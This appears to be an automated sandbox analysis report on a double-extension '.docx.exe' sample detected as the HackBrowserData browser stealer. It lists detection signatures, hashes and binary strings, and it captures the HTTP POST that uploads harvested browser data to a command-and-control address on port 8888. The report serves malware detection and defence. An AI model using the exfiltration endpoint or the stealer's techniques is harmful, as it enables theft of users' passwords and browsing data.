Edit tour

Windows Analysis Report
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Overview

General Information

Sample name:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe renamed because original name is a hash value
Original sample name:	.docx.exe
Analysis ID:	1533050
MD5:	daf21b9d206ce16fc3bd087abd0c6389
SHA1:	76c67b3413830e45b0a5d938fb7976d47da10579
SHA256:	a62c290374a53ae0e30ba18422ead75f2a271a4b58cd6204940112364246d7ac
Infos:

Detection

HackBrowser

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Yara detected HackBrowser

AI detected suspicious sample

Tries to harvest and steal browser information (history, passwords, etc)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Communication To Uncommon Destination Ports

Classification

Process Tree

System is w10x64

#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe (PID: 5952 cmdline: "C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe" MD5: DAF21B9D206CE16FC3BD087ABD0C6389)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
HackBrowserData	Browser information stealer, written in Go.	No Attribution	https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign	https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	JoeSecurity_HackBrowser	Yara detected HackBrowser	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_HackBrowser	Yara detected HackBrowser	Joe Security
00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_HackBrowser	Yara detected HackBrowser	Joe Security
Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952	JoeSecurity_HackBrowser	Yara detected HackBrowser	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe", CommandLine: "C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, NewProcessName: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, OriginalFileName: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe", ProcessId: 5952, ProcessName: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 43.248.8.109, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, Initiated: true, ProcessId: 5952, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	ReversingLabs: Detection: 54%
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 43.248.8.109:8888

Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109

Source: unknown

HTTP traffic detected: POST /upload HTTP/1.1Host: 43.248.8.109:8888User-Agent: Go-http-client/1.1Content-Length: 908Content-Type: multipart/form-data; boundary=20d5805c7f211953f7ac5355ef88de92a98d5cde4287aa1efa9f46f5ca46Accept-Encoding: gzipData Raw: 2d 2d 32 30 64 35 38 30 35 63 37 66 32 31 31 39 35 33 66 37 61 63 35 33 35 35 65 66 38 38 64 65 39 32 61 39 38 64 35 63 64 65 34 32 38 37 61 61 31 65 66 61 39 66 34 36 66 35 63 61 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 65 6e 63 72 79 70 74 65 64 2d 34 31 39 36 30 39 33 38 32 30 2e 64 61 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a4 1d 4b 2c e7 6a 36 63 91 af fc 60 a9 de 62 97 8c 65 20 42 43 02 22 a4 90 66 5f f9 f0 59 9f 75 03 c4 98 fb b6 f7 53 45 5e 96 68 1c 31 ed 5d 14 d2 6d ac a8 69 10 be 91 05 34 98 d5 8e 5b e0 ae ca 26 11 24 ab 58 4a 72 28 44 cb 3b 8e e1 79 c2 26 69 b1 ce 69 bc 37 87 a5 e3 7f 2c e7 56 f5 65 41 c0 07 ad 95 38 15 15 11 b4 a0 8d 9a 9a 36 58 af af d6 fd b5 47 93 45 69 ba bd 41 44 e2 c2 0c 02 0f 8f 81 8c 47 ce 77 5d 10 b5 44 69 e3 9a 86 26 0a 30 ab 82 1e d1 be 09 3c fc 20 e0 15 c2 5a 0b bb de 12 f0 dc a7 5b e8 5e 0f da 6d ae e6 35 ec 50 7c b7 0c 09 5c 7f 8e 0c 9b 22 31 e9 ce c5 fb df 79 86 0a f5 db 96 ef 3d e1 29 6b 5b e3 d1 81 6d 43 f6 9c 63 e6 a8 eb 0f 80 42 ce 93 63 e2 86 90 4c c2 14 50 56 f3 ed ed 52 45 f0 89 52 c2 0a 4e 84 3b 5e cb c5 9c 4d eb 61 fe 9c 1c 1b af aa 6c cf fd f5 a3 4e 82 69 5b 65 74 1c 5a dc 01 79 e4 c5 6f 22 04 1c 3c 72 af bb 90 6d 0b 17 71 ec 44 53 e0 4b 8d 8e ee d8 b5 17 4e f8 04 5c cb 68 51 49 04 57 2f 77 7c 33 cd e3 49 9a 98 0b 8c 31 ff 19 93 88 41 a3 de eb a4 3a 14 41 05 59 65 b7 4a 80 77 9c 53 f0 6e d4 c3 4c 50 a9 e5 dd e5 1b 3c b3 1d c9 34 7b 9a 15 9e b1 65 19 fa 95 57 17 83 42 0c f8 d3 3e ef 98 ba 8a f5 5e fc 35 e5 7a 5f 18 30 08 6c 23 03 95 ce bb 2d 1d 6e 91 67 f0 fe 76 d1 40 98 1e fd 07 9d cc 93 03 08 c1 66 67 68 bc ed a5 77 e9 ed 6a 3e 91 09 a7 1d 12 3e 6c 0d f7 26 b3 95 7e f6 a9 94 7b 2e af 0a 11 83 85 53 60 8b 22 ba 37 d6 45 f3 d1 d9 af f6 98 c8 50 02 4e da b4 05 42 11 ff 01 b1 2f 05 d3 f1 09 da cb af b9 82 c6 5d 2f 09 6e ba 47 b4 6c f1 ac 3f fc 3d 84 4c 6f 9e 10 50 aa 8e d1 06 83 41 3d a4 4c eb 7d 60 00 14 02 13 24 61 14 f9 e4 49 42 d5 1d ad c7 07 31 17 a5 63 60 e2 b5 33 21 2f b3 9f 18 17 46 96 fa 6e eb a6 e2 23 5a f2 50 68 bf 10 66 14 fe d9 01 a0 ac 27 b2 6d 1e 00 5b 67 b8 82 0b 0b 1d 94 c6 5a 84 af ca 7f ae 0c 97 bd 10 c6 6c 8a b9 e7 ba c8 93 44 e1 b6 7c 03 9f 95 44 3e 76 cd 93 30 32 99 10 58 c4 01 6a 70 d8 b5 f0 82 81 02 fa c6 d5 0a 27 5a a9 db 8a 85 36 d9 45 f5 bb 21 23 49 84 e2 f5 a8 d9 e2 f0 0d 0a 2d 2d 32 30 64 35 38 30 35 63 37 66 32 31 31 39 35 33 66 37 61 63 35 33 35 35 65 66 38 38 64 65 39 32 61 39 38 64 35 63 64 65 34 32 38 37 61 61 31 65 66 61 39 66 34 36 66 35 63 61 34 36 2d 2d 0d 0a Data Ascii: --20d5805c7f211953f7ac

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: http://43.248.8.109:8888/uploadfmt:
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: http://file://mailto:http://BINARY-x0X03.46.0
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://chrome.google.com/webstore
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://chrome.google.com/webstore/detail/PrintableString
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://docs.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive.google.com/
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://github.com/moonD4rk/HackBrowserDataCompactions
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000158000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureC:
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000082000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdsync:
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://www.google.com/
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@1/25@0/1

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File created: C:\Users\user\AppData\Roaming\hack

Jump to behavior

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File created: C:\Users\user\AppData\Local\Temp\Session Storage_8.temp

Jump to behavior

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File opened: C:\Windows\system32\fdbf095845fec0d5191b65c42ea175df5321dde82964753c62540ae72ea57c83AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2090778427.0000017DE6495000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2092505050.0000017DE6525000.00000004.00001000.00020000.00000000.sdmp, Login Data_1.temp.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	ReversingLabs: Detection: 54%
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Virustotal: Detection: 50%

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: leveldb/memdb: iterator releasedleveldb/table: iterator releasedbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecrypto/aes: output not full blockpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qerror creating output file %s: %werror writing data to file %s: %wcomplete -r -c %s -n '%s' -a '%s'visibleGlobalFlagCategoryTemplateskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length slice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangego package net: confVal.netCgo = empty hex number for chunk lengthtoo many levels of symbolic linksInitializeProcThreadAttributeListwaiting for unsupported file typeinvalid value %q for flag -%s: %vincompatible types for comparisoncannot index slice/array with nilcrypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/des: output not full blocktoo many Answers to pack (>65535)DES3Decrypt: ciphertext too shortsql: connection is already closedfailed to get main source db nameinsufficient memory for aggregateencoding: missing byte order mark&CounterClockwiseContourIntegral;regexp: unhandled case in compilescalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "CString: cannot allocate %d bytesSCGQUUSGSCOMPRKCYMSPMSRBATFMYTATNmemdb@flush committed F
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: leveldb/memdb: iterator releasedleveldb/table: iterator releasedbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecrypto/aes: output not full blockpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qerror creating output file %s: %werror writing data to file %s: %wcomplete -r -c %s -n '%s' -a '%s'visibleGlobalFlagCategoryTemplateskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length slice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangego package net: confVal.netCgo = empty hex number for chunk lengthtoo many levels of symbolic linksInitializeProcThreadAttributeListwaiting for unsupported file typeinvalid value %q for flag -%s: %vincompatible types for comparisoncannot index slice/array with nilcrypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/des: output not full blocktoo many Answers to pack (>65535)DES3Decrypt: ciphertext too shortsql: connection is already closedfailed to get main source db nameinsufficient memory for aggregateencoding: missing byte order mark&CounterClockwiseContourIntegral;regexp: unhandled case in compilescalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "CString: cannot allocate %d bytesSCGQUUSGSCOMPRKCYMSPMSRBATFMYTATNmemdb@flush committed F
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: failed to construct HKDF label: %sillegal base64 data at input byte too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: flag provided but not defined: -%scan't evaluate field %s in type %scan't handle %s for arg of type %svalue is nil; should be of type %scrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapsql: expected %d arguments, got %dunpaired removeDep: no deps for %Tdecrypt chromium credit card errorcannot find extensions in settingssemaphore: released more than heldinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizedriver: remove argument from queryunsupported type %T, a slice of %sleveldb/table: invalid slice rangesnappy: decoded block is too largesnappy: unsupported literal lengthunsigned integer overflow on token 2006-01-02T15:04:05.999999999Z07:00form-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0error creating zip entry for %s: %werror removing original file %s: %whash/crc32: invalid hash state sizestrings.Reader.Seek: invalid whencenon-positive interval for 